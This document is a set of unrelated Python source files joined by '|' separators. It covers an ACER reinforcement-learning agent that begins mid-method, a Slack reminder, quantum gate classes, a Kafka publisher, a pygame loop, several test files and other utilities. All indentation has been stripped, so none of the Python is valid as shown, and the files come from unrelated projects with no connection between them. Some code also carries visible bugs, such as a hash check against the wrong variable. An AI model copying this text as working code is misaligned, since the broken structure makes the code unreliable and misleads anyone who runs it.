if offline:
batch = self.buffer.sample()
else:
batch = self.collect_episode()
states, actions, rewards, b_policies, dones = batch
policies, q_values, avg_policies = [], [], []
# =================== COLLECT DATA =============================
k = states.shape[0]
for i in range(k):
state = states[i]
policy, q_value = self.model(state)
avg_policy, _ = self.average_model(state)
avg_policy.detach_()
policies.append(policy)
q_values.append(q_value)
avg_policies.append(avg_policy)
policies = torch.stack(policies)
q_values = torch.stack(q_values)
avg_policies = torch.stack(avg_policies)
# ========================= LEARN ==============================
value = (policies[k-1] * q_values[k-1])\
.sum(-1, keepdims=True).detach()
q_ret = value
loss = 0
for t in reversed(range(k-1)):
value = (policies[t]
* q_values[t]).sum(-1, keepdims=True).detach()
q_ret = rewards[t] + self.gamma * q_ret * (1-dones[t])
ratio = (policies[t] / (b_policies[t]+eps)).detach()
correction_constant = ((1 - self.clip/(ratio+eps)).clamp(min=0)
* policies[t]).detach()
policy_log = (policies[t]+eps).log()
delta = q_ret - q_values[t].gather(1, actions[t])
policy_loss = -(ratio.gather(1, actions[t]).clamp(max=self.clip)
* policy_log.gather(1, actions[t])
* (q_ret - value)
).mean()
policy_loss += -(correction_constant
* policy_log
* (q_values[t].detach() - value)).sum(-1).mean()
critic_loss = ((delta).pow(2) / 2).mean()
# ========================= TRPO ===========================
if self.use_trpo:
k_grad = (avg_policies[t] / (policies[t]+eps)).detach()
gradient = -torch.autograd.grad(inputs=policies,
outputs=policy_loss,
retain_graph=True)[0][t]
k_dot_g = (k_grad * gradient).sum(-1).mean()
k_dot_k = (k_grad * k_grad).sum(-1).mean()
# the vector that will be subtracted from the gradient
grad_offset_norm = ((k_dot_g - self.trpo_theta)
/ k_dot_k).clamp(min=0)
# kl divergence
kl_div = (avg_policies[t]
* ((avg_policies[t] + eps).log()
- (policies[t] + eps).log())).sum(-1).mean()
policy_trpo_loss = (grad_offset_norm * kl_div)
policy_loss += policy_trpo_loss
# ==========================================================
entropy_loss = -(Categorical(policies[t]).entropy()
* self.entropy_coefficient).mean()
loss += (critic_loss + policy_loss + entropy_loss)
q_ret = (ratio.gather(1, actions[t]).clamp(max=1)
* (delta).detach()
+ value
)
# update average model and shared model,
self.optimizer.zero_grad()
loss.backward()
if self.max_grad_norm is not None:
torch.nn.utils.clip_grad_norm_(self.model.parameters(),
self.max_grad_norm)
model_utils.transfer_gradients(self.model, self.shared_model)
self.optimizer.step()
model_utils.soft_update_model(self.shared_model, self.average_model,
1 - self.polyak_alpha)
# runs in parallel
def run(self):
for i in range(self.max_episodes):
self.learn(offline=False)
if i < self.start_off_policy:
continue
n = int(np.random.exponential(self.replay_n))
for e in range(n):
self.learn()
self.queue.put("done")
self.env.close()
class ACER:
def __init__(self, *args, **kwargs):
if "env_constr" not in kwargs or "env_name" not in kwargs:
print("Environment is required")
raise ValueError
network = kwargs["network"]
self.shared_model = network
self.average_model = copy.deepcopy(self.shared_model)
self.shared_model.share_memory()
self.average_model.share_memory()
self.queue = mp.Queue()
lr = kwargs["lr"] if "lr" in kwargs else 1e-3
self.optimizer = AdamShared(self.shared_model.parameters(), lr=lr)
self.n_env = kwargs["n_env"]
self.args = args
self.kwargs = kwargs
self.kwargs["average_model"] = self.average_model
self.kwargs["queue"] = self.queue
self.kwargs["optimizer"] = self.optimizer
self.env_constr = kwargs["env_constr"]
self.env_args = kwargs["env_args"]
def train(self, max_score, alg_name="acer", tmax=200):
agents = [ACER_Agent(*self.args, **self.kwargs, mp_id=i)\
for i in range(self.n_env)]
[agent.start() for agent in agents]
scores = []
last_scores = deque(maxlen=max(100, self.n_env*25))
done = 0
i = 0
while True:
msg = self.queue.get()
if msg != "done": # msg is score
i += 1
scores.append(msg)
last_scores.append(msg)
avg_score = np.mean(last_scores)
print("\rScore: ", msg, end="")
if avg_score >= max_score:
print("\nSolved!")
[agent.terminate() for agent in agents]
break
else:
done += 1
if done == self.n_env:
break
[agent.join() for agent in agents]
"""
Save the model
"""
fname = "checkpoints/{}.pth".format(alg_name)
torch.save(self.shared_model.state_dict(), fname)
return scores
def act(self, state, deterministic=False):
state = torch.from_numpy(state).float().unsqueeze(0)
policy, q_value = self.shared_model(state)
if deterministic:
action = policy.argmax(-1).item()
else:
action = Categorical(policy).sample().item()
return action
def test(self, n_episodes, max_t, render=True, deterministic=False):
# test
env = self.env_constr(*self.env_args)
for i in range(n_episodes):
score = 0
state = env.reset()
for i in range(max_t):
action = self.act(state, deterministic)
state, reward, done, _ = env.step(action)
if render:
env.render()
score += reward
if done:
break
print(score)
env.close()
def save(self, fname):
torch.save({"actor_critic_sd": self.shared_model.state_dict()}, fname)
def load(self, fname):
dat = torch.load(fname)
self.shared_model.load_state_dict(dat["actor_critic_sd"])
|
import os
os.system("python 1_search_standard_box_spacer_0_16_greedy.py")
os.system("python 2_search_specific_box_spacer_0_16_greedy.py")
os.system("python 3_search_Epsilonproteobacteria_box_spacer_0_16_greedy.py")
os.system("python 4_concat_delete_repeat.py")
os.system("python 5_box1_box2.py")
os.system("python 6_search_upstream_box.py")
os.system("python 7_adjust_box.py")
os.system("python 8_calculate_spacer_len.py")
os.system("python 9_adjust_box_mismatch.py")
os.system("python 10_minmismatch_newspacer.py")
os.system("python 11_score_trio.py")
os.system("python 12_screen.py")
os.system("python 14_connect_seq.py")
|
import torch
from constant.readFile import getPredictData
from constant.constPath import modelPath, predictSize
def startPredict():
data = getPredictData()
l = data.shape[1]
net = torch.load(modelPath)
test_in = torch.from_numpy(data[:predictSize, :l - 1]).float()
test_out = net(test_in)
id = data[:predictSize, l - 1]
label = test_out.max(-1)[1]
# for i in range(predictSize):
# print(int(id[i]), int(lab[i]))
return id, label
|
#encoding:utf-8
import torch
import numpy as np
from ..common.tools import model_device, parse_idx
from ..callback.progressbar import ProgressBar
from pybert.train.metrics import MRR, Recall, NDCG, EIM, REIM, RIIM
from pybert.configs.basic_config import config
class Predictor(object):
def __init__(self,
model,
logger,
n_gpu,
i2w,
i2l
):
self.model = model
self.logger = logger
self.model, self.device = model_device(n_gpu= n_gpu, model=self.model)
self.i2w = i2w
self.i2l = i2l
def predict(self,data):
pbar = ProgressBar(n_total=len(data))
all_logits = None
self.model.eval()
test_metrics = [MRR(), NDCG(), Recall(), EIM(config['data_label_path'],self.i2w,self.i2l), RIIM(config['data_label_path'],self.i2w,self.i2l), REIM(config['data_label_path'],self.i2w,self.i2l)]
implicit_metrics = ["eim","riim","reim"]
with torch.no_grad():
for step, batch in enumerate(data):
batch = tuple(t.to(self.device) for t in batch)
input_ids, input_mask, segment_ids, label_ids = batch
logits = self.model(input_ids, segment_ids, input_mask)
for metric in test_metrics:
if metric.name() in implicit_metrics:
metric(input_ids=input_ids, output=logits, target=label_ids)
else:
metric(logits=logits, target=label_ids)
logits = logits.sigmoid()
if all_logits is None:
all_logits = logits.detach().cpu().numpy()
else:
all_logits = np.concatenate([all_logits,logits.detach().cpu().numpy()],axis = 0)
pbar.batch_step(step=step,info = {},bar_type='Testing')
for metric in test_metrics:
metric.show()
if 'cuda' in str(self.device):
torch.cuda.empty_cache()
return all_logits
def job_labels(self, label_indices):
labels = []
for idx in label_indices:
labels.append(self.i2l[idx])
return labels
def print_labels(self,logits,idx):
sorted_prediction_indices = np.flip(np.argsort(logits[idx]))
sorted_prediction_indices = sorted_prediction_indices[:20]
predicted_labels = self.job_labels(sorted_prediction_indices)
print("prediction {}: {}".format(idx,predicted_labels))
def labels(self,logits,idx):
idx = parse_idx(idx,logits.shape[0])
print("-"*89)
print("printing labels")
for i in idx:
self.print_labels(logits,i) |
#!/usr/bin/python
import yaml
import requests
import requests
import csv
import sys
import json
from datetime import datetime, timedelta
from os.path import expanduser
import time
config_file = expanduser("~") + "/.datereminder/config.yml"
print config_file
mmdd = datetime.now().strftime("%m-%d")
yyyy = datetime.now().strftime("%Y")
yyyymmdd = date = datetime.now().strftime("%Y-%m-%d")
todayObj = datetime.strptime(yyyymmdd, "%Y-%m-%d")
try:
config = yaml.safe_load(open(config_file))
except:
print "Unable to read config file."
sys.exit(0)
def slack(chan, text):
payload = {
"text": text,
"channel": chan,
"icon_emoji": config['icon_emoji'],
"username": config['username']
}
slackr = requests.post(config['webhook'], data=json.dumps(payload))
print "Slack response:", slackr.text
time.sleep(1)
def is_valid_year(year):
if year and year.isdigit():
if int(year) >= 1900 and int(year) <= 2100:
return True
return False
csv_r = requests.get(config['downloadurl'])
if csv_r.status_code != 200:
print "Unable fo fetch spreadsheet. Not a 200 status code."
sys.exit(0)
ss = list(csv.reader(csv_r.text.split('\n')))
header = ss[0]
headerN = {}
for cellN in range(0, len(header)):
headerN[header[cellN].strip().lower()] = cellN
for row in ss[1:]:
record = {}
for n in range(0, len(row)):
for hcol in headerN.keys():
if headerN[hcol] == n:
if row[n].strip() != '':
record[hcol] = row[n]
if all(col in record.keys()
for col in ['mm-dd', 'type', 'channel', 'days prior', 'text']):
#print "Valid Record", record
rec_date_obj = datetime.strptime(yyyy + "-" + record['mm-dd'],
"%Y-%m-%d")
if 'year' in record.keys() and is_valid_year(record['year']):
rec_alert_date_obj = datetime.strptime(
record['year'] + "-" + record['mm-dd'],
"%Y-%m-%d") - timedelta(days=int(record['days prior']))
else:
rec_alert_date_obj = datetime.strptime(
yyyy + "-" + record['mm-dd'],
"%Y-%m-%d") - timedelta(days=int(record['days prior']))
if todayObj >= rec_alert_date_obj and todayObj <= rec_date_obj:
days = (rec_date_obj - todayObj).days
daystext = " in " + str(days) + " day"
if days > 1:
daystext += "s"
elif days == 0:
daystext = " today"
if record['type'].lower().strip() == 'birthday':
text = ':birthday: ' + record['text'] + " has a birthday" + daystext + " on " + record['mm-dd']
elif record['type'].lower().strip() == 'work anniversary':
text = ':partyparrot: ' + record['text'] + " has a work anniversary" + daystext + " on " + record['mm-dd']
else:
text = record['text'] + daystext + " on " + record['mm-dd']
print record['channel'], text
slack(record['channel'], text)
|
print("how old are you", end=' ')
# end=' ' tells print line to not end line with new line character
age = input()
print("How tall are you?", end=' ')
height = input()
print("How much do you weigh?", end=' ')
weight = input()
print(f"So, you're {age} years old, {height}cm tall and {weight}kg heavy.")
|
'''Functions to diff a local subtree with its remote.'''
import click
import requests
def repo_commits_since(repo, since_ref, headers):
if since_ref:
compare_url = repo['compare_url'].format(base=since_ref, head='master')
compare_resp = requests.get(compare_url, headers=headers)
compare_resp.raise_for_status()
return compare_resp.json()
else:
commits = []
all_commits_url = repo['commits_url'].format(**{'/sha': ''})
next_commits_url = all_commits_url + '?per_page=100'
while next_commits_url:
commits_resp = requests.get(next_commits_url, headers=headers)
commits_resp.raise_for_status()
commits.extend(commits_resp.json())
next_commits_url = (commits_resp.links.get('next') or {}).get('url')
return {
'status': 'ahead',
'ahead_by': len(commits),
'commits': commits,
}
def tags_in_commits(repo, commits, headers):
tags_resp = requests.get(repo['tags_url'], headers=headers)
tags_resp.raise_for_status()
commits_by_sha = {commit['sha']: commit for commit in commits}
return [tag for tag in tags_resp.json() if tag['commit']['sha'] in commits_by_sha]
def print_diverged(remote):
click.echo('{} is diverged from {}.'.format(
remote.subtree.prefix,
remote.repo['html_url'],
))
def print_subtree_diff(subtree_remotes):
'''Prints a summary diff of subtree remotes that are ahead.'''
if len(subtree_remotes) == 1 and not subtree_remotes[0].is_ahead:
print_up_to_date(subtree_remotes[0])
return
max_prefix_len = max(len(remote.subtree.prefix) for remote in subtree_remotes) + 3
max_repo_len = max(len(remote.repo['html_url']) for remote in subtree_remotes) + 3
row_format = '{:<' + str(max_prefix_len) + '}{:<' + str(max_repo_len) + '}{:<15}{:<30}'
click.secho(row_format.format('Prefix', 'Remote', 'Ahead By', 'Tags Since', underline=True))
for remote in subtree_remotes:
if not remote.subtree.exists:
ahead_by = '(new)'
elif remote.is_diverged:
ahead_by = '(diverged)'
elif remote.commits_since['ahead_by']:
ahead_by = remote.commits_since['ahead_by']
else:
ahead_by = '(up-to-date)'
click.secho(row_format.format(
remote.subtree.prefix,
remote.repo['html_url'],
ahead_by,
', '.join(sorted(tag['name'] for tag in remote.tags_since)) or '(none)',
))
def print_up_to_date(remote):
click.echo('{} already up-to-date with {}.'.format(
remote.subtree.prefix,
remote.repo['html_url'],
))
|
import os
import os.path
import hashlib
from os.path import join as pjoin
def download_file(source, target):
return 'wget %s -O %s' % (source, target)
def get_file_list(base_path, include_list = None, exclude_list = None):
if not isinstance(include_list, (list, tuple)):
include_list = [ include_list ]
if not exclude_list:
exclude_list = []
def is_included(file_path):
for path in include_list:
if file_path.find(path) == 0:
return True
return False
def is_excluded(file_path):
for path in exclude_list:
if file_path.find(path) == 0:
return True
return False
files = []
for (dirpath, dirname, filenames) in os.walk(base_path):
for file_name in filenames:
file_path = pjoin(dirpath.replace('%s/' % (base_path), ''), file_name)
if is_included(file_path) and not is_excluded(file_path):
files.append(file_path)
return files
def file_sum(file_path, hash_type='md5'):
if hash not in [ 'sha1', 'md5' ]:
raise ValueError('Invalid hash type: %s' % (hash_type))
file_hash = getattr(hashlib, hash_type, None)
with open(file_path, 'rb') as fp:
content = fp.read()
file_hash.update(content)
return file_hash.hexdigest()
def get_tar_bin_path(where_is_func, possible_names=None):
if not possible_names:
possible_names = [ 'gnutar', 'gtar', 'tar' ]
for binary in possible_names:
binary_path = where_is_func(binary)
if binary_path:
return binary_path
return None
|
import mock
import pytest
import unittest2
@pytest.mark.funnel
class FunnelTests(unittest2.TestCase):
def _get_class(self):
from kardboard.services.funnel import Funnel
return Funnel
def test_funnel_state(self):
config = {
'Build to OTIS': {
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.state == "Build to OTIS"
def test_funnel_throughput(self):
config = {
'Build to OTIS': {
'throughput': 2,
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert 2 == f.throughput
def test_funnel_no_throughput(self):
config = {
'Build to OTIS': {
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.throughput is None
def test_funnel_auth_none(self):
config = {
'Build to OTIS': {
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.is_authorized('joe') is True
def test_funnel_auth_tru(self):
config = {
'Build to OTIS': {
'auth': ['joe', 'jane']
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.is_authorized('joe') is True
def test_funnel_auth_false(self):
config = {
'Build to OTIS': {
'auth': ['joe', 'jane']
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.is_authorized('jack') is False
def test_find_cards(self):
with mock.patch('kardboard.services.funnel.Kard') as mock_Kard:
f = self._get_class()('Build to OTIS', {})
mock_Kard.objects.filter.return_value.exclude.return_value = []
result = f.find_cards()
mock_Kard.objects.filter.assert_called_with(
state="Build to OTIS",
)
mock_Kard.objects.filter.return_value.exclude.assert_called_with(
'_ticket_system_data',
)
assert result == []
def test_state_duration(self):
with mock.patch('kardboard.services.funnel.StateLog') as mock_StateLog:
f = self._get_class()('Build to OTIS', {})
card = mock.Mock()
fake_statelog = mock.Mock()
fake_statelog.duration = 20
mock_StateLog.objects.filter.return_value.order_by.return_value = [fake_statelog, ]
duration = f.state_duration(card)
mock_StateLog.objects.filter.assert_called_with(
card=card,
state=f.state
)
mock_StateLog.objects.filter.return_value.order_by.assert_called_with(
'-entered',
)
assert 20 == duration
|
#!/usr/bin/python3
"""
Copyright 2018-2019 Firmin.Sun ([email protected])
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# -----------------------------------------------------
# @Time : 12/4/2018 4:04 PM
# @Author : Firmin.Sun ([email protected])
# @Software: ZJ_AI
# -----------------------------------------------------
# -*- coding: utf-8 -*-
from functools import reduce
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.') |
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
UsageStr = """
Single Task Regression and Performance Execute Utility
-h, --help - when present, displays this message
-x, --process-max - The max number of concurrent processes
-l,--msg-lev= - Set the output level, implemented as a bit mask example
if you want warnings and debug pass 20, 4 + 16
"nomsg" [0x0000]- supresses all message
"crit" [0x0001]- Critical Errors Messages
"err" [0x0002]- Non Critical Errors Messages
"warn" [0x0004]- Include Warning Messages
"info" [0x0008]- Run Info Messages
"dbg" [0x0010]- Debug Information
"user" [0x0020]- Special Messages
"trace" [0x0040]- provides call stack trace info
"noinfo" [0x0080]- supresses the info label
Example: "err"+"warn"+"dbg" will post messages
[ERROR] - Shows Non Critical Error Messages and
[WARN] - shows warning messages and
[DEBUG] - Shows debug messages and nothing else
Default: "crit+err+warn+info+noinfo"
To use the default log level and add levels prepend that level with a (+)
To use the default log level and remove levels prepend that level with a (-)
Example:
[-l +trace-crit+user]
will create an output level err+warn+info+noinfo+trace+user
"""
class Defaults(object):
msg_level = "crit+err+warn+info+noinfo"
process_max = 16
help = False
class CmdLine(object):
# Allowed Command Line Switches
Switches = ["help", "process-max=", "msg-lev="] # 0 # 1 # 2
# Help can triggered with a single letter
ShortOpts = "hx:l:"
# command Switch Index
help_index = 0
process_max_index = 1
msg_lev_index = 2
# Short Opts
Help = "-h"
MsgLevel = "-l"
ProcessMax = "-x"
|
# Copyright 2019 UniversalQCompiler (https://github.com/Q-Compiler/UniversalQCompiler)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from numpy import sin,cos
from functools import reduce
from copy import copy
def single_qubitify(mat, channel, n):
""" given a unitary 2x2 matrix and the channel to apply it on
returns the associated 2**n x 2**n matrix"""
assert mat.shape == (2,2)
return reduce(np.kron, [
np.identity(2**(n-channel-1)),
mat,
np.identity(2**channel)
])
def change_channel_order(mat, frm,to):
"""returns the matrix corresponding to mat when the tensored basis is reordered: frm <-> to"""
def swap_bits(n,i,j):
"""swaps i-th and j-th bit in n"""
bits_are_different = int((n >> i) % 2 != (n >> j) % 2)
return n ^ ((bits_are_different << i) | (bits_are_different << j))
n,m = mat.shape
return np.array(
[[mat[swap_bits(i,frm,to), swap_bits(j,frm,to)] for j in range(m)] for i in range(n)]
)
class Gate:
def compute(self, vec):
raise NotImplementedError("compute() for "+type(self)+' not defined')
def get_matrix(self, dim):
raise TypeError("Matrix of "+type(self)+' not defined')
def inverse(self):
raise TypeError('Inverse of '+type(self)+' not defined')
class SimpleGate(Gate):
# uses the representation defined in the concrete gates
def __repr__(self, fmt=''):
cpy = copy(self)
for attr in [k for k,v in self.parameters.items() if v is float]:
if type(getattr(cpy, attr)) is not float:
# parametrised template
continue
setattr(cpy, attr, round(getattr(cpy,attr), self.str_digit_rounding))
return self.representation.replace('{', '{0.').format(cpy)
def __init__(self, channel_offset=0, **kwargs):
self.str_digit_rounding = 2
for k,v in kwargs.items():
try:
# handle synonyms
if hasattr(self, 'synonyms') and k in self.synonyms:
k = self.synonyms[k]
# this is for one-off channel count in Mathematica
if self.parameters[k] is int:
setattr(self, k, self.parameters[k](v) - channel_offset)
else:
setattr(self, k, self.parameters[k](v))
except KeyError:
raise TypeError("'" + k + "' is an invalid keyword argument for this function")
def compute(self, vec):
n = int(np.log2(len(vec)))
return np.dot(self.get_matrix(n), vec)
@property
def channels(self):
try:
return [self.channel]
except AttributeError:
return [self.channel1, self.channel2]
def max_channel(self):
return max(self.channels)
# always keep the angle between 0 and 2pi
@property
def angle(self):
return self.__angle
@angle.setter
def angle(self, angle):
try:
self.__angle = angle % (2 * np.pi)
except TypeError:
# parametrised angles
self.__angle = angle
pass
class ComposedGate(Gate, list):
def compute(self, vec):
for g in reversed(self):
vec = g.compute(vec)
return vec
def get_matrix(self, dim):
ret = np.identity(2**dim)
for g in self:
ret = np.dot(ret, g.get_matrix(dim))
return ret
def inverse(self):
return list(map(lambda gate: gate.inverse(), reversed(self)))
def copy(self):
return ComposedGate(super(ComposedGate, self).copy())
def of_qubit(self, qubit):
"""
iterator only through gates concerning qubit `qubit`
"""
for g in self:
if isinstance(g, OneQubitGate):
if g.channel == qubit:
yield g
elif isinstance(g, TwoQubitGate):
if g.channel1 == qubit or g.channel2 == qubit:
yield g
else:
raise NotImplementedError
def max_channel(self):
return max(map(SimpleGate.max_channel, self))
class OneQubitGate(SimpleGate):
def get_matrix(self, dim=1):
if dim == 1:
return self.__matrix__()
else:
return single_qubitify(self.__matrix__(), self.channel, dim)
class TwoQubitGate(SimpleGate):
def get_matrix(self, dim=2):
"""applies kronecker product to gate matrix for the n-spin situation"""
if dim == 2:
ret = self.__matrix__()
else:
ret = np.kron(np.identity(2**(dim-2)), self.__matrix__())
# you need to be careful not to swap order twice
if self.channel1 == 1 and self.channel2 == 0:
ret = change_channel_order(ret, 0, 1)
elif self.channel1 == 1:
ret = change_channel_order(ret, 1, self.channel2)
ret = change_channel_order(ret, 0, self.channel1)
elif self.channel2 == 0:
ret = change_channel_order(ret, 0, self.channel1)
ret = change_channel_order(ret, 1, self.channel2)
elif self.channel1 == 0 and self.channel2 == 1:
pass
else:
ret = change_channel_order(ret, 0, self.channel1)
ret = change_channel_order(ret, 1, self.channel2)
return ret
class Rx(OneQubitGate):
representation = 'Rx({channel})({angle})'
parameters = {'channel': int, 'angle': float}
def inverse(self):
return Rx(channel=self.channel, angle=-self.angle)
def __matrix__(self):
return np.array(
[[cos(self.angle/2), -1j*sin(self.angle/2)],
[-1j*sin(self.angle/2), cos(self.angle/2)]])
class Ry(OneQubitGate):
representation = 'Ry({channel})({angle})'
parameters = {'channel':int, 'angle':float}
def inverse(self):
return Ry(channel=self.channel, angle=-self.angle)
def __matrix__(self):
return np.array(
[[cos(self.angle/2), -sin(self.angle/2)],
[sin(self.angle/2), cos(self.angle/2)]])
class Rz(OneQubitGate):
representation = 'Rz({channel})({angle})'
parameters = {'channel':int, 'angle':float}
def inverse(self):
return Rz(channel=self.channel, angle=-self.angle)
def __matrix__(self):
return np.array(
[[np.exp(-1j*self.angle/2), 0],
[0, np.exp(1j*self.angle/2)]])
class R(OneQubitGate):
representation = 'R({channel})({theta},{phi})'
parameters = {'channel':int, 'theta':float, 'phi':float}
def __matrix__(self):
return np.array(
[[np.cos(self.theta/2), -1j * np.exp(-1j*self.phi)*np.sin(self.theta/2)],
[-1j*np.exp(1j*self.phi)*np.sin(self.theta/2), np.cos(self.theta/2)]])
class CNot(TwoQubitGate):
representation = 'C({channel2})({channel1})'
parameters = {'channel1':int, 'channel2':int}
synonyms = {'control': 'channel2', 'target': 'channel1'}
def inverse(self):
return CNot(channel1=self.channel1, channel2=self.channel2)
def __matrix__(self):
return np.array(
[[1,0,0,0],
[0,1,0,0],
[0,0,0,1],
[0,0,1,0]])
class Swap(TwoQubitGate):
"""
This gate swaps the two qubits.
This is useful for some template identity. All instances of Swap are removed during CNot_simplify
"""
representation = 'S({channel1})({channel2})'
parameters = {'channel1': int, 'channel2':int}
def inverse(self):
return Swap(channel1=self.channel1, channel2=self.channel2)
def __matrix__(self):
return np.array(
[[1,0,0,0],
[0,0,1,0],
[0,1,0,0],
[0,0,0,1]])
class XX(TwoQubitGate):
representation = 'XX({channel1})({channel2})({angle})'
parameters = {'channel1': int, 'channel2': int, 'angle': float}
def __matrix__(self):
return np.array(
[[cos(self.angle), 0, 0, -1j*sin(self.angle)],
[0, cos(self.angle), -1j*sin(self.angle), 0],
[0, -1j*sin(self.angle), cos(self.angle), 0],
[-1j*sin(self.angle), 0, 0, cos(self.angle)]])
|
import json
from chalice import Chalice
from chalicelib import webexteams
app = Chalice(app_name='whois_bot')
bot_email = '[email protected]'
@app.route('/')
def hello():
return "Hi, this is working"
@app.route('/browsertest/{tech}')
def browser(tech):
name = webexteams.lookup(tech)
return "{name} is responsible for {tech}".format(name=name, tech=tech)
@app.route('/test', methods=['POST'])
def index():
# Get the POST data sent from Webex Teams
json_data = app.current_request.json_body
# Get the room details
roomId = json_data['data']['roomId']
# Get the message details
messageId = json_data['data']['id']
# make sure it isn't yourself, dumb bot!
if json_data['data']['personEmail'] != bot_email:
if 'cisco.com' in json_data['data']['personEmail']:
webexteams.ask(roomId, messageId)
else:
webexteams.sorry(roomId)
|
import pygame, sys, config
import sprites
import audio
from screens.menu_settings import menu_settingsScreen
from screens.game_screen import gameScreen
from screens.menu_screen import menuScreen
from screens.choose_map_screen import chooseMapScreen
#Initialize pygame
pygame.init()
#load sprites
sprites.init()
#load audio
audio.init()
config.menu_settingsScreen = menu_settingsScreen()
config.gameScreen = gameScreen()
config.menuScreen = menuScreen()
config.chooseMapScreen = chooseMapScreen()
#frames per second
fpsClock = pygame.time.Clock()
#Display the screen
config.screen = pygame.display.set_mode(config.SCREEN_SIZE)
#Name on the window
pygame.display.set_caption('Supernatural')
#Icon
icon = pygame.image.load('content/sprites/icon.jpg')
pygame.display.set_icon(icon)
#Current screen being displayed
config.current_screen = menuScreen()
#Game loop, makes the screen on all the time unless running = false
while not config.quit_game:
config.events = pygame.event.get()
for event in config.events:
#Quit
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
config.screen.fill((0, 0, 0))
config.current_screen.update(fpsClock.get_time())
config.current_screen.draw(config.screen)
pygame.display.update()
if config.sound_song_on == False:
pygame.mixer.music.pause()
fpsClock.tick(60) # set the FPS to 60
#Name on the window with FPS
pygame.display.set_caption(f'Supernatural - fps: {fpsClock.get_fps()}') |
#!/usr/bin/env python
import unittest
from day17 import open_doors, bfs
class TestFindsOpenDoorsFromHashAndPath(unittest.TestCase):
cases = (
('hijkl', '', ['U', 'D', 'L']),
('hijkl', 'D', ['U', 'L', 'R']),
('hijkl', 'DU', ['R']),
('hijkl', 'DUR', []),
)
def test_finds_open_doors(self):
for seed, path, expected in self.cases:
self.assertEqual(open_doors(seed, path), expected)
class TestFindsShortestPath(unittest.TestCase):
cases = (
('ihgpwlah', 'DDRRRD'),
('kglvqrro', 'DDUDRLRRUDRD'),
('ulqzkmiv', 'DRURDRUDDLLDLUURRDULRLDUUDDDRR'),
)
def test_finds_shortest_path(self):
for seed, expected in self.cases:
start = (0, 0)
goal = (3, 3)
paths = bfs(seed, start, goal)
self.assertEqual(paths[0], expected)
class TestFindsLongestPath(unittest.TestCase):
cases = (
('ihgpwlah', 370),
('kglvqrro', 492),
('ulqzkmiv', 830),
)
def test_finds_shortest_path(self):
for seed, expected in self.cases:
start = (0, 0)
goal = (3, 3)
paths = bfs(seed, start, goal)
self.assertEqual(len(paths[-1]), expected)
if __name__ == '__main__':
unittest.main()
|
from kafka import KafkaProducer
from kafka.errors import KafkaError
from kafka.future import log
import json
import random
import time
import re
import csv
def publish(producer, topic_name, metric_value, timestamp, unit, device_id, context):
value = {'records': [{ 'value': { 'metric_value':(metric_value), 'timestamp':(timestamp), 'unit':(unit), 'device_id':(device_id), 'context':(context) }}]}
print("Publishing in Kafka: %s", value)
futures = producer.send(topic=topic_name, value=value)
response = futures.get()
print(response)
print("Process data from Day-2 Configuration files and save them in variables")
# Remember this file path is known in advance due to the information model proposed
day2_file_path = "/usr/bin/expb_metricId-day2-config.yml"
f = open(day2_file_path, "r")
broker_ip_address = f.readline().split(":")[1].strip() + ":9092" # not used if Filebeat is provided
topic_name = f.readline().split(":")[1].strip() # not used if Filebeat is provided
device_id = f.readline().split(":")[1].strip()
unit = f.readline().split(":")[1].strip()
interval = f.readline().split(":")[1].strip()
interval_value = int(re.compile('([0-9]+)([a-zA-Z]+)').match(interval).group(1)) # Each $interval_value time, metric will be captured
interval_unit = re.compile('([0-9]+)([a-zA-Z]+)').match(interval).group(2)
context = f.readline().split(":")[1].strip().replace("|", " ") # change "|" for " "
# Transform the interval_value consequently
if interval_unit == "s":
interval_value = interval_value/1;
elif interval_unit == "ms":
interval_value = interval_value/1000;
# In this example, metrics are generated randomly
print("Start capturing metrics")
producer = KafkaProducer(bootstrap_servers = broker_ip_address, value_serializer=lambda x: json.dumps(x).encode('utf-8'))
n_iter=10 # for avoiding an infinite loop
for i in range(n_iter):
print("Metric value ", i+1)
metric_value = random.uniform(-2,2)
timestamp = time.time()
publish(producer, topic_name, metric_value, timestamp, unit, device_id, context)
time.sleep(interval_value)
print("Script finished")
|
import unittest
from conans import tools
from conans.client.configure_build_environment import VisualStudioBuildEnvironment
from conans.test.utils.conanfile import MockConanfile, MockSettings
class BuildEnvironmentHelpers(unittest.TestCase):
def test_visual(self):
settings = MockSettings({})
conanfile = MockConanfile(settings)
conanfile.deps_cpp_info.include_paths.append("/one/include/path")
conanfile.deps_cpp_info.include_paths.append("/two/include/path")
conanfile.deps_cpp_info.lib_paths.append("/one/lib/path")
